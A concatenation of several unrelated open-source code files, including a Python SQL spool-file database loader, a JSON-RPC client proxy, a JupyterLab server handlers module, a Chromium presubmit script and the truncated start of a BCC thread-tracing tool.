"expirydate": sqlalchemy.types.Date,
"datecompleted": sqlalchemy.types.Date,
"datereceived": sqlalchemy.types.Date,
"datelocalauthority": sqlalchemy.types.Date,
"dateregistrar": sqlalchemy.types.Date,
"datedecision": sqlalchemy.types.Date,
"dateentered": sqlalchemy.types.Date,
"submissiondate": sqlalchemy.types.Date,
"documentdate": sqlalchemy.types.Date
}
def getType(self, columnName):
retType = self.defaultType
if columnName.lower() in self.typeMap:
retType = self.typeMap[columnName.lower()]
return retType
class ColumnDef:
def __init__(self, columnName, columnLength=None, columnPosition=None, columnType=None):
self.columnName = columnName
self._columnLength = columnLength
self.columnType = columnType
self._columnPosition = columnPosition
@property
def columnLength(self):
return self._columnLength
@columnLength.setter
def columnLength(self, columnLength):
if not isinstance(columnLength, int):
_columnLength = int(columnLength)
@property
def columnPosition(self):
return self._columnPosition
@columnPosition.setter
def columnPosition(self, columnPosition):
if not isinstance(columnPosition, int):
self._columnPosition = int(columnPosition)
def __str__(self):
outStr = f'{self.columnName} {self._columnLength} {self._columnPosition}'
return outStr
class ColumnDefs:
def __init__(self):
self.columnDefs = []
self.curPos = 0
self.typeMap = TypeMap()
def addColumnDef(self, columnDef):
# update the type with the type map
columnDef.columnType = self.typeMap.getType(columnDef.columnName)
self.columnDefs.append(columnDef)
def __iter__(self):
return self
def __next__(self):
if self.curPos >= len(self.columnDefs):
self.curPos = -1
raise StopIteration
retVal = self.columnDefs[self.curPos]
self.curPos += 1
return retVal
def __len__(self):
return len(self.columnDefs)
def __str__(self):
outStr = []
for columnDef in self.columnDefs:
outStr.append(str(columnDef))
return str(outStr)
def getDataDict(self, line):
"""Gets an input data line, uses the parameters in the column definition to
restructure the line into a data dict that can be used to insert the data into
the database.
:param line: input data line that was generated using the spool file
defs that will be dumped into the database
:type line: str
"""
outDict = {}
colCnt = 0
LOGGER.debug(f'columnDefs: {len(self)}')
for columnDef in self:
startPosition = columnDef.columnPosition
columnLength = columnDef.columnLength
endPosition = startPosition + columnLength
dataValue = line[startPosition:endPosition].strip()
if columnDef.columnType == sqlalchemy.types.Integer:
if dataValue == '0':
dataValue = 0
elif not dataValue:
dataValue = None
else:
dataValue = int(dataValue)
if columnDef.columnType == sqlalchemy.types.Date:
if not dataValue:
dataValue = None
else:
try:
dataValue = datetime.datetime.strptime(dataValue, DATEFORMAT)
except ValueError:
LOGGER.warning(f'invalid date value: {dataValue}')
raise
outDict[columnDef.columnName] = dataValue
LOGGER.debug(f'{colCnt} : {columnDef.columnName} : -{dataValue}-')
colCnt += 1
return outDict
class ReadSqlSpoolFiles:
"""used to read the .lis files and extract:
* column names
* column lengths
* column column types
gets this information by parsing out the column definitions from the sql
file. Format for SQL plus formatting:
https://docs.oracle.com/cd/B19306_01/server.102/b14357/ch12013.htm#BACHCABF
"""
def __init__(self, inputSpoolFile):
self.inputSpoolFile = inputSpoolFile
# used to identify a line that includes a column def
columnDefRegexString = '^\s*column\s+\w+\s+format\s+\w+.*;$'
self.coldefRegex = re.compile(columnDefRegexString)
# used to extract the length from the column def
replaceRegextString = '^\s*column\s+\w+\s+format\s+\w{1}'
self.replaceRegex = re.compile(replaceRegextString)
# stores the linesize defined in the spoolfile
self.linesize = None
# def getDataTableName(self):
# baseName = os.path.splitext(os.path.basename(self.inputSpoolFile))[0] + '.lis'
# dirName = os.path.dirname(self.inputSpoolFile)
# dataTable = os.path.join(dirName, baseName)
def getColumnName(self, line):
# re.split(pattern, string, maxsplit=0, flags=0)
lineSplit = re.split('\s+', line)
LOGGER.debug(f"split line: {lineSplit}")
return lineSplit[1]
def isSetDef(self, line, paramName=None):
"""parses the input line looking for a pattern starts with a
'set' parameter
if the added paramName is provided then looks for a set statement
where the parameter that is being set, and returns true if the
line is a 'set' line for that 'paramName'
:param line: input line to be evaluated
:type line: str
:param paramName: [name of the input parameter], defaults to None
:type paramName: [str], optional
:return: [a boolean indicating if the line is a 'set' line and if a parameter
is provided whether its a set for that parameter]
:rtype: [bool]
"""
retVal = False
line = line.replace(';', '')
lineList = re.split("\s+", line)
#LOGGER.debug(f'LineList: {lineList}, {paramName}')
if lineList[0].lower() == 'set':
if paramName is not None:
if paramName.lower() == lineList[1].lower():
retVal = True
else:
retVal = True
#LOGGER.debug(f'retVal: {retVal}')
return retVal
def getSetValue(self, line):
"""assumes that the input line is a 'set' line and if so will
return the value that corresponds with the set
:param line: [input line]
:type line: [type]
:return:
"""
retVal = None
if self.isSetDef(line):
line = line.replace(';', '')
lineList = re.split("\s+", line)
retVal = lineList[-1]
return retVal
def getDefs(self):
"""reads the input sql file used to generate the dump file
and extracts the column name definitions.
:return: a list of numbers that identify the column positions where one column
starts and another ends
:rtype: list
"""
# columnLengths will be a list defining the locations in list of characters
# where one column starts and another ends
columnLengths = ColumnDefs()
prevValue = 0
with open(self.inputSpoolFile) as fh:
for line in fh:
line = line.strip()
if self.isSetDef(line, "linesize"):
linesize = self.getSetValue(line)
LOGGER.debug(f"linesize: {linesize}")
if self.isColumnDef(line):
LOGGER.debug(f'input line: {line}')
colName = self.getColumnName(line)
colLength = self.getColumnLength(line)
columnPosition = prevValue
colDef = ColumnDef(colName, colLength, columnPosition)
columnLengths.addColumnDef(colDef)
prevValue = prevValue + 1 + colLength
return columnLengths
def getColumnLength(self, line):
strippedString = self.replaceRegex.sub('', line).replace(';', '').strip()
LOGGER.debug(strippedString)
return int(strippedString)
def isColumnDef(self, line):
match = False
if self.coldefRegex.match(line):
match = True
LOGGER.debug(f'line: {line}')
return match
class CreateDBTable:
"""using the sql spool file that was used to create the dump files will
create a database table with the same prefix as the name of the spool
file.
Name of the table can be overriden by providing that arg
"""
def __init__(self, sqlSpoolFile, tableName=None):
if tableName is None:
tableName = os.path.splitext(os.path.basename(sqlSpoolFile))[0]
self.tableName = tableName
self.sqlSpoolFile = sqlSpoolFile
self.readSpool = ReadSqlSpoolFiles(self.sqlSpoolFile)
self.columnDefs = self.readSpool.getDefs()
def listTables(self):
inspector = sqlalchemy.inspect(DB_ENGINE)
for table_name in inspector.get_table_names():
for column in inspector.get_columns(table_name):
LOGGER.debug("Column: %s" % column['name'])
def createTable(self):
saTable = sqlalchemy.Table(self.tableName, DB_METADATA)
for coldef in self.columnDefs:
column = sqlalchemy.Column(coldef.columnName, coldef.columnType)
saTable.append_column(column, replace_existing=True)
LOGGER.info(f"creating the table: {self.tableName}")
DB_METADATA.create_all(DB_ENGINE)
def dropTable(self):
table = DB_METADATA.tables[self.tableName]
LOGGER.info(f"dropping the table: {self.tableName}")
table.drop(DB_ENGINE)
#DB_METADATA.drop_all(bind=DB_ENGINE, tables=[table])
def tableExists(self, tableName, connection):
tableExist = True
if not DB_ENGINE.dialect.has_table(connection, tableName):
tableExist = False
return tableExist
#def getSourceDataRowCount(self):
def getRowCount(self, tableName):
Session = sqlalchemy.orm.sessionmaker(bind=DB_ENGINE)
session = Session()
rows = session.query(DB_METADATA.tables[self.tableName]).count()
session.close()
rows = int(rows)
LOGGER.info(f"table {self.tableName} row count: {rows} {type(rows)}")
return rows
def loadData(self, dataFile, dumpReplace=True):
"""[summary]
:param dataFile: [description]
:type dataFile: [type]
:param dumpReplace: [description], defaults to True
:type dumpReplace: bool, optional
"""
# TODO: the sql def file has a parameter called linesize. Need to ignore the carriage returns and treat input data as a stream.
bufferSize = 1000
bufferCnt = 0
buffer = []
if dumpReplace:
self.dropTable()
LOGGER.debug(f"column defs: {self.columnDefs}")
with DB_ENGINE.connect() as conn:
# get rows in datafile
LOGGER.info(f"datafile to load: {dataFile}")
rowsInDataFile = sum(1 for line in open(dataFile, "r", encoding='cp1252'))
LOGGER.info(f"rows in data file {os.path.basename(dataFile)} : {rowsInDataFile}")
with open(dataFile, "r", encoding='cp1252') as f:
table = DB_METADATA.tables[self.tableName]
if not self.tableExists(self.tableName, conn):
self.createTable()
# get rows in table
dbTableRowCount = self.getRowCount(self.tableName)
LOGGER.info(f"src row count: {rowsInDataFile} dest row count: {dbTableRowCount}")
if dbTableRowCount != rowsInDataFile and dbTableRowCount != 0:
# rows in source and destination do not align, so recreate
self.dropTable()
self.createTable()
dbTableRowCount = 0
if not dbTableRowCount and rowsInDataFile:
rowsInserted = 0
for line in f:
dataDict = self.columnDefs.getDataDict(line)
buffer.append(dataDict)
if bufferCnt >= bufferSize:
conn.execute(table.insert(), buffer)
bufferCnt = -1
buffer = []
LOGGER.info(f"rows inserted: {rowsInserted}")
#insStatement = sqlalchemy.insert(table).values(**dataDict)
#result = conn.execute(insStatement)
#if not rowsInserted % 200:
# LOGGER.debug(f"inserted {rowsInserted}")
rowsInserted += 1
bufferCnt += 1
if buffer:
conn.execute(table.insert(), buffer)
bufferCnt = -1
buffer = []
LOGGER.info(f"rows {bufferCnt} inserted: {rowsInserted}")
if __name__ == '__main__':
# logging setup
LOGGER.setLevel(logging.INFO)
hndlr = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(message)s')
hndlr.setFormatter(formatter)
LOGGER.addHandler(hndlr)
LOGGER.debug("first test message")
# load a single table
# ----------------------------------
# inputDataFile = '/home/kjnether/proj/site/sampledata/srprfuse.lis'
# sqlDefFile = '/home/kjnether/proj/site/runscript_local/bconline/srprfuse.sql'
# createDb = CreateDBTable(sqlDefFile)
# createDb.createTable()
# createDb.listTables()
# createDb.loadData(inputDataFile)
# loading all tables
tableDir = r'/home/kjnether/proj/site/sampledata/*.lis'
sqlDir = r'/home/kjnether/proj/site/runscript_local/bconline'
#files = os.listdir(tableDir)
datafiles = glob.glob(tableDir)
LOGGER.debug(f"datafiles: {datafiles}")
exceptionList = []
for curFile in datafiles:
if os.path.basename(curFile) == 'srprofil.lis':
exceptionList.append(curFile)
for exceptionFile in exceptionList:
datafiles.remove(exceptionFile)
LOGGER.debug(f'list of data files: {datafiles}')
for datafile in datafiles:
sqlFile = os.path.splitext(os.path.basename(datafile))[0] + '.sql'
sqlFileFullPath = os.path.join(sqlDir, sqlFile)
if not os.path.exists(sqlFileFullPath):
msg = f'the sql file {sqlFileFullPath} does not exist'
raise ValueError(msg)
createDb = CreateDBTable(sqlFileFullPath)
createDb.createTable()
createDb.listTables()
createDb.loadData(datafile, False)
|
the-stack_106_16971
|
import os
settings = {
'base_dir': os.path.dirname(__file__),
# cash True or False
'cash': False,
# set name for apps dir
'apps_dir': os.path.abspath(os.path.dirname(__file__) + '/apps'),
# set apps folder name
'apps_folder_name': 'apps',
# set routes file
'routes_file': 'routes.py',
# set controller file
'controller': 'controller.py',
# set list of apps
'apps': [
'main',
],
}
def get_settings():
return settings
|
the-stack_106_16972
|
"""
Copyright (c) 2011 Jeff Garzik
AuthServiceProxy has the following improvements over python-jsonrpc's
ServiceProxy class:
- HTTP connections persist for the life of the AuthServiceProxy object
(if server supports HTTP/1.1)
- sends protocol 'version', per JSON-RPC 1.1
- sends proper, incrementing 'id'
- sends Basic HTTP authentication headers
- parses all JSON numbers that look like floats as Decimal
- uses standard Python json lib
Previous copyright, from python-jsonrpc/jsonrpc/proxy.py:
Copyright (c) 2007 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
try:
import http.client as httplib
except ImportError:
import httplib
import base64
import decimal
import json
import logging
import socket
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
USER_AGENT = "AuthServiceProxy/0.1"
HTTP_TIMEOUT = 30
log = logging.getLogger("BitcoinRPC")
class JSONRPCException(Exception):
def __init__(self, rpc_error):
try:
errmsg = '%(message)s (%(code)i)' % rpc_error
except (KeyError, TypeError):
errmsg = ''
Exception.__init__(self, errmsg)
self.error = rpc_error
def EncodeDecimal(o):
if isinstance(o, decimal.Decimal):
return str(o)
raise TypeError(repr(o) + " is not JSON serializable")
class AuthServiceProxy(object):
__id_count = 0
# ensure_ascii: escape unicode as \uXXXX, passed to json.dumps
def __init__(self, service_url, service_name=None, timeout=HTTP_TIMEOUT, connection=None, ensure_ascii=True):
self.__service_url = service_url
self._service_name = service_name
self.ensure_ascii = ensure_ascii # can be toggled on the fly by tests
self.__url = urlparse.urlparse(service_url)
if self.__url.port is None:
port = 80
else:
port = self.__url.port
(user, passwd) = (self.__url.username, self.__url.password)
try:
user = user.encode('utf8')
except AttributeError:
pass
try:
passwd = passwd.encode('utf8')
except AttributeError:
pass
authpair = user + b':' + passwd
self.__auth_header = b'Basic ' + base64.b64encode(authpair)
if connection:
# Callables re-use the connection of the original proxy
self.__conn = connection
elif self.__url.scheme == 'https':
self.__conn = httplib.HTTPSConnection(self.__url.hostname, port,
timeout=timeout)
else:
self.__conn = httplib.HTTPConnection(self.__url.hostname, port,
timeout=timeout)
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
if self._service_name is not None:
name = "%s.%s" % (self._service_name, name)
return AuthServiceProxy(self.__service_url, name, connection=self.__conn)
def _request(self, method, path, postdata):
'''
Do a HTTP request, with retry if we get disconnected (e.g. due to a timeout).
This is a workaround for https://bugs.python.org/issue3566 which is fixed in Python 3.5.
'''
headers = {'Host': self.__url.hostname,
'User-Agent': USER_AGENT,
'Authorization': self.__auth_header,
'Content-type': 'application/json'}
try:
self.__conn.request(method, path, postdata, headers)
return self._get_response()
except httplib.BadStatusLine as e:
if e.line == "''": # if connection was closed, try again
self.__conn.close()
self.__conn.request(method, path, postdata, headers)
return self._get_response()
else:
raise
except (BrokenPipeError,ConnectionResetError):
# Python 3.5+ raises BrokenPipeError instead of BadStatusLine when the connection was reset
# ConnectionResetError happens on FreeBSD with Python 3.4
self.__conn.close()
self.__conn.request(method, path, postdata, headers)
return self._get_response()
def __call__(self, *args, **argsn):
AuthServiceProxy.__id_count += 1
log.debug("-%s-> %s %s"%(AuthServiceProxy.__id_count, self._service_name,
json.dumps(args, default=EncodeDecimal, ensure_ascii=self.ensure_ascii)))
if args and argsn:
raise ValueError('Cannot handle both named and positional arguments')
postdata = json.dumps({'version': '1.1',
'method': self._service_name,
'params': args or argsn,
'id': AuthServiceProxy.__id_count}, default=EncodeDecimal, ensure_ascii=self.ensure_ascii)
response = self._request('POST', self.__url.path, postdata.encode('utf-8'))
if response['error'] is not None:
raise JSONRPCException(response['error'])
elif 'result' not in response:
raise JSONRPCException({
'code': -343, 'message': 'missing JSON-RPC result'})
else:
return response['result']
def _batch(self, rpc_call_list):
postdata = json.dumps(list(rpc_call_list), default=EncodeDecimal, ensure_ascii=self.ensure_ascii)
log.debug("--> "+postdata)
return self._request('POST', self.__url.path, postdata.encode('utf-8'))
def _get_response(self):
try:
http_response = self.__conn.getresponse()
except socket.timeout as e:
raise JSONRPCException({
'code': -344,
'message': '%r RPC took longer than %f seconds. Consider '
'using larger timeout for calls that take '
'longer to return.' % (self._service_name,
self.__conn.timeout)})
if http_response is None:
raise JSONRPCException({
'code': -342, 'message': 'missing HTTP response from server'})
content_type = http_response.getheader('Content-Type')
if content_type != 'application/json':
raise JSONRPCException({
'code': -342, 'message': 'non-JSON HTTP response with \'%i %s\' from server' % (http_response.status, http_response.reason)})
responsedata = http_response.read().decode('utf8')
response = json.loads(responsedata, parse_float=decimal.Decimal)
if "error" in response and response["error"] is None:
log.debug("<-%s- %s"%(response["id"], json.dumps(response["result"], default=EncodeDecimal, ensure_ascii=self.ensure_ascii)))
else:
log.debug("<-- "+responsedata)
return response
|
the-stack_106_16976
|
# -*- coding: utf-8 -*-
from collections import MutableMapping
import inspect
def _ipython(local, banner):
from IPython.terminal.embed import InteractiveShellEmbed
from IPython.terminal.ipapp import load_default_config
InteractiveShellEmbed.clear_instance()
shell = InteractiveShellEmbed.instance(
banner1=banner,
user_ns=local,
config=load_default_config()
)
shell()
# class GlobalDict(DictMixin):
# def __init__(self, dict=None, **kwargs):
# self.data = {}
# if dict is not None:
# self.update(dict)
# if len(**kwargs):
# self.update(kwargs)
# @abstractmethod
# def __getitem__(self, key):
# retrun self.data[id]
#
# @abstractmethod
# def __setitem__(self, key, value):
# self.data[id] = value
#
# @abstractmethod
# def __delitem__(self, key):
# del self.data[id]
#
# def keys(self):
# return self.data.keys()
class ConfigG(dict):
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries, but keyword arguments are not recommended because
their insertion order is arbitrary.
'''
if not args:
pass
else:
self = args[0]
args = args[1:]
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __getattr__(self,name):
try:
return dict.__getitem__(self, name)
except:
raise AttributeError()
def __setattr__(self,name,value):
if name.startswith('_ConfigG__'):
return dict.__setitem__(self, name, value)
else:
return self.__setitem__(name, value)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
return dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, _ = self.__map.pop(key)
link_prev[1] = link_next # update link_prev[NEXT]
link_next[0] = link_prev # update link_next[PREV]
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root[1] # start at the first node
while curr is not root:
yield curr[2] # yield the curr[KEY]
curr = curr[1] # move to next node
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root[0] # start at the last node
while curr is not root:
yield curr[2] # yield the curr[KEY]
curr = curr[0] # move to previous node
def clear(self):
'od.clear() -> None. Remove all items from od.'
# root = self.__root
# root[:] = [root, root, None]
#self.__map.clear()
#dict.clear(self)
for k in self:
if k.startswith('_ConfigG__'):
pass
else:
self.pop(k)
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) pairs in od'
for k in self:
yield (k, self[k])
update = MutableMapping.update
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
key = next(reversed(self) if last else iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(ConfigG()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
G = ConfigG()
_ipython(None, '')
|
the-stack_106_16978
|
# coding: utf-8
"""Jupyter Lab Launcher handlers"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import os
from tornado import web, template
from notebook.base.handlers import IPythonHandler, FileFindHandler
from jinja2 import FileSystemLoader, TemplateError
from notebook.utils import url_path_join as ujoin
from traitlets import HasTraits, Bool, Unicode
from .workspaces_handler import WorkspacesHandler
from .settings_handler import SettingsHandler
from .themes_handler import ThemesHandler
# -----------------------------------------------------------------------------
# Module globals
# -----------------------------------------------------------------------------
# The default urls for the application.
default_public_url = '/lab/static/'
default_workspaces_url = '/lab/workspaces/'
default_workspaces_api_url = '/lab/api/workspaces/'
default_settings_url = '/lab/api/settings/'
default_themes_url = '/lab/api/themes/'
default_tree_url = '/lab/tree/'
DEFAULT_TEMPLATE = template.Template("""
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<h2>Cannot find template: "{{name}}"</h2>
<p>In "{{path}}"</p>
</body>
</html>
""")
class LabHandler(IPythonHandler):
"""Render the JupyterLab View."""
def initialize(self, lab_config):
self.lab_config = lab_config
self.file_loader = FileSystemLoader(lab_config.templates_dir)
@web.authenticated
@web.removeslash
def get(self):
config = self.lab_config
settings_dir = config.app_settings_dir
# Handle page config data.
page_config = self.settings.setdefault('page_config_data', {})
terminals = self.settings.get('terminals_available', False)
server_root = self.settings.get('server_root_dir', '')
server_root = server_root.replace(os.sep, '/')
page_config.setdefault('terminalsAvailable', terminals)
page_config.setdefault('ignorePlugins', [])
page_config.setdefault('serverRoot', server_root)
mathjax_config = self.settings.get('mathjax_config',
'TeX-AMS_HTML-full,Safe')
page_config.setdefault('mathjaxConfig', mathjax_config)
page_config.setdefault('mathjaxUrl', self.mathjax_url)
for name in config.trait_names():
page_config[_camelCase(name)] = getattr(config, name)
# Load the current page config file if available.
page_config_file = os.path.join(settings_dir, 'page_config.json')
if os.path.exists(page_config_file):
with open(page_config_file) as fid:
try:
page_config.update(json.load(fid))
except Exception as e:
print(e)
# Handle error when the assets are not available locally.
local_index = os.path.join(config.static_dir, 'index.html')
if config.static_dir and not os.path.exists(local_index):
self.write(self.render_template(
'error.html', static_dir=config.static_dir
))
return
# Write the template with the config.
self.write(self.render_template('index.html', page_config=page_config))
def get_template(self, name):
return self.file_loader.load(self.settings['jinja2_env'], name)
def render_template(self, name, **ns):
try:
return IPythonHandler.render_template(self, name, **ns)
except TemplateError:
return DEFAULT_TEMPLATE.generate(
name=name, path=self.lab_config.templates_dir
)
class LabConfig(HasTraits):
"""The lab application configuration object.
"""
app_name = Unicode('', help='The name of the application.')
app_version = Unicode('', help='The version of the application.')
app_namespace = Unicode('', help='The namespace of the application.')
page_url = Unicode('/lab', help='The url path for the application.')
app_settings_dir = Unicode('', help='The application settings directory.')
templates_dir = Unicode('', help='The application templates directory.')
static_dir = Unicode('',
help=('The optional location of local static files. '
'If given, a static file handler will be '
'added.'))
public_url = Unicode(default_public_url,
help=('The url public path for static application '
'files. This can be a CDN if desired.'))
settings_url = Unicode(default_settings_url,
help='The url path of the settings handler.')
user_settings_dir = Unicode('',
help=('The optional location of the user '
'settings directory.'))
schemas_dir = Unicode('',
help=('The optional location of the settings '
'schemas directory. If given, a handler will '
'be added for settings.'))
workspaces_dir = Unicode('',
help=('The optional location of the saved '
'workspaces directory. If given, a handler '
'will be added for workspaces.'))
workspaces_url = Unicode(default_workspaces_url,
help='The url path of the workspaces handler.')
themes_url = Unicode(default_themes_url, help='The theme url.')
themes_dir = Unicode('',
help=('The optional location of the themes '
'directory. If given, a handler will be added '
'for themes.'))
tree_url = Unicode(default_tree_url,
help='The url path of the tree handler.')
cache_files = Bool(True,
help=('Whether to cache files on the server. '
'This should be `True` except in dev mode.'))
class NotFoundHandler(LabHandler):
def render_template(self, name, **ns):
if 'page_config' in ns:
ns['page_config'] = ns['page_config'].copy()
ns['page_config']['notFoundUrl'] = self.request.path
return LabHandler.render_template(self, name, **ns)
def add_handlers(web_app, config):
"""Add the appropriate handlers to the web app.
"""
# Normalize directories.
for name in config.trait_names():
if not name.endswith('_dir'):
continue
value = getattr(config, name)
setattr(config, name, value.replace(os.sep, '/'))
# Set up the main page handler and tree handler.
base_url = web_app.settings['base_url']
lab_url = ujoin(base_url, config.page_url)
tree_url = ujoin(base_url, config.tree_url + r'.+')
handlers = [
(lab_url, LabHandler, {'lab_config': config}),
(tree_url, LabHandler, {'lab_config': config})
]
# Cache all or none of the files depending on the `cache_files` setting.
no_cache_paths = [] if config.cache_files else ['/']
# Handle local static assets.
if config.static_dir:
config.public_url = ujoin(base_url, default_public_url)
handlers.append((config.public_url + '(.*)', FileFindHandler, {
'path': config.static_dir,
'no_cache_paths': no_cache_paths
}))
# Handle local settings.
if config.schemas_dir:
config.settings_url = ujoin(base_url, default_settings_url)
settings_path = config.settings_url + '(?P<section_name>.+)'
handlers.append((settings_path, SettingsHandler, {
'app_settings_dir': config.app_settings_dir,
'schemas_dir': config.schemas_dir,
'settings_dir': config.user_settings_dir
}))
# Handle saved workspaces.
if config.workspaces_dir:
# Handle JupyterLab client URLs that include workspaces.
config.workspaces_url = ujoin(base_url, default_workspaces_url)
workspaces_path = ujoin(config.workspaces_url, r'/.+')
handlers.append((workspaces_path, LabHandler, {'lab_config': config}))
# Handle API requests for workspaces.
config.workspaces_api_url = ujoin(base_url, default_workspaces_api_url)
workspaces_api_path = config.workspaces_api_url + '(?P<space_name>.+)'
handlers.append((workspaces_api_path, WorkspacesHandler, {
'workspaces_url': config.workspaces_url,
'path': config.workspaces_dir
}))
# Handle local themes.
if config.themes_dir:
config.themes_url = ujoin(base_url, default_themes_url)
handlers.append((
ujoin(config.themes_url, '(.*)'),
ThemesHandler,
{
'themes_url': config.themes_url,
'path': config.themes_dir,
'no_cache_paths': no_cache_paths
}
))
# Let the lab handler act as the fallthrough option instead of a 404.
fallthrough_url = ujoin(base_url, config.page_url, r'.*')
handlers.append((fallthrough_url, NotFoundHandler, {'lab_config': config}))
web_app.add_handlers('.*$', handlers)
def _camelCase(base):
"""Convert a string to camelCase.
https://stackoverflow.com/a/20744956
"""
output = ''.join(x for x in base.title() if x.isalpha())
return output[0].lower() + output[1:]
|
the-stack_106_16980
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
def PostUploadHook(cl, change, output_api):
return output_api.EnsureCQIncludeTrybotsAreAdded(
cl,
[
'master.tryserver.chromium.linux:closure_compilation',
],
'Automatically added optional Closure bots to run on CQ.')
def CheckChangeOnUpload(input_api, output_api):
return _CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return _CommonChecks(input_api, output_api)
# For every modified gyp file, warn if the corresponding GN file is not updated.
def _CheckForGNUpdate(input_api, output_api):
gyp_folders = set()
for f in input_api.AffectedFiles():
local_path = f.LocalPath()
if local_path.endswith('compiled_resources2.gyp'):
gyp_folders.add(os.path.dirname(local_path))
for f in input_api.AffectedFiles():
local_path = f.LocalPath()
dir_name = os.path.dirname(local_path)
if local_path.endswith('BUILD.gn') and dir_name in gyp_folders:
gyp_folders.remove(dir_name)
if not gyp_folders:
return []
return [output_api.PresubmitPromptWarning("""
You may have forgotten to update the BUILD.gn Closure Compilation for the
following folders:
""" + "\n".join(["- " + x for x in gyp_folders]) + """
Ping calamity@ or check go/closure-compile-gn for more details.
""")]
def _CheckForTranslations(input_api, output_api):
shared_keywords = ['i18n(']
html_keywords = shared_keywords + ['$118n{']
js_keywords = shared_keywords + ['I18nBehavior', 'loadTimeData.']
errors = []
for f in input_api.AffectedFiles():
local_path = f.LocalPath()
# Allow translation in i18n_behavior.js.
if local_path.endswith('i18n_behavior.js'):
continue
# Allow translation in the cr_components directory.
if 'cr_components' in local_path:
continue
keywords = None
if local_path.endswith('.js'):
keywords = js_keywords
elif local_path.endswith('.html'):
keywords = html_keywords
if not keywords:
continue
for lnum, line in f.ChangedContents():
if any(line for keyword in keywords if keyword in line):
errors.append("%s:%d\n%s" % (f.LocalPath(), lnum, line))
if not errors:
return []
return [output_api.PresubmitError("\n".join(errors) + """
Don't embed translations directly in shared UI code. Instead, inject your
translation from the place using the shared code. For an example: see
<cr-dialog>#closeText (http://bit.ly/2eLEsqh).""")]
def _CommonChecks(input_api, output_api):
results = []
results += _CheckForTranslations(input_api, output_api)
results += _CheckForGNUpdate(input_api, output_api)
results += input_api.canned_checks.CheckPatchFormatted(input_api, output_api,
check_js=True)
try:
import sys
old_sys_path = sys.path[:]
cwd = input_api.PresubmitLocalPath()
sys.path += [input_api.os_path.join(cwd, '..', '..', '..', 'tools')]
from web_dev_style import presubmit_support
BLACKLIST = ['ui/webui/resources/js/analytics.js',
'ui/webui/resources/js/jstemplate_compiled.js']
file_filter = lambda f: f.LocalPath() not in BLACKLIST
results += presubmit_support.CheckStyle(input_api, output_api, file_filter)
finally:
sys.path = old_sys_path
return results
|
the-stack_106_16984
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# threadsnoop List new thread creation.
# For Linux, uses BCC, eBPF. Embedded C.
#
# Copyright (c) 2019 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License").
# This was originally created for the BPF Performance Tools book
# published by Addison Wesley. ISBN-13: 9780136554820
# When copying or porting, include this comment.
#
# 02-Jul-2019 Brendan Gregg Ported from bpftrace to BCC.
from __future__ import print_function
from bcc import BPF
# load BPF program
b = BPF(text="""
